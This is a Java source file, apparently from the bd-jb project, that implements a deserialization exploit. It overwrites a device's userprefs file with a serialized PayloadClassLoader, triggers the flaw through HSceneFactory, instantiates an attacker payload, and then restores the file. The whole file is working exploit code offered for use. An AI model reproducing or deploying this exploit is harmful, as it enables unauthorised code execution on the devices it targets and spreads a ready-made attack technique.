bd-jb/com/bdjb/ExploitUserPrefsImpl.java
2021-10-27 18:14:29 +02:00

57 lines
1.7 KiB
Java

/*
* Copyright (C) 2021 Andy Nguyen
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import org.havi.ui.HSceneFactory;
/** Implementation of the userprefs deserialization exploit. */
class ExploitUserPrefsImpl implements ExploitInterface {
private static final String MNT_ADA_USERPREFS = "/OS/HDD/download0/mnt_ada/userprefs";
private static final String PAYLOAD_CLASS_LOADER_SER = "/com/bdjb/PayloadClassLoader.ser";
public void trigger() throws Exception {
try {
// Overwrite userprefs with a serialized PayloadClassLoader.
InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER);
OutputStream outputStream = new FileOutputStream(MNT_ADA_USERPREFS);
byte[] buf = new byte[8192];
int read;
while ((read = inputStream.read(buf)) > 0) {
outputStream.write(buf, 0, read);
}
outputStream.close();
inputStream.close();
// Trigger deserialization vulnerability.
try {
HSceneFactory.getInstance().getDefaultHScene();
} catch (ClassCastException e) {
// Exception expected.
// Instantiate the payload class.
PayloadClassLoader.getInstance().newPayload();
}
} finally {
// Restore userprefs file.
String[][] preferences = new String[9][];
preferences[3] = new String[] {"26"};
ObjectOutputStream outputStream =
new ObjectOutputStream(new FileOutputStream(MNT_ADA_USERPREFS));
outputStream.writeObject(preferences);
outputStream.close();
}
}
}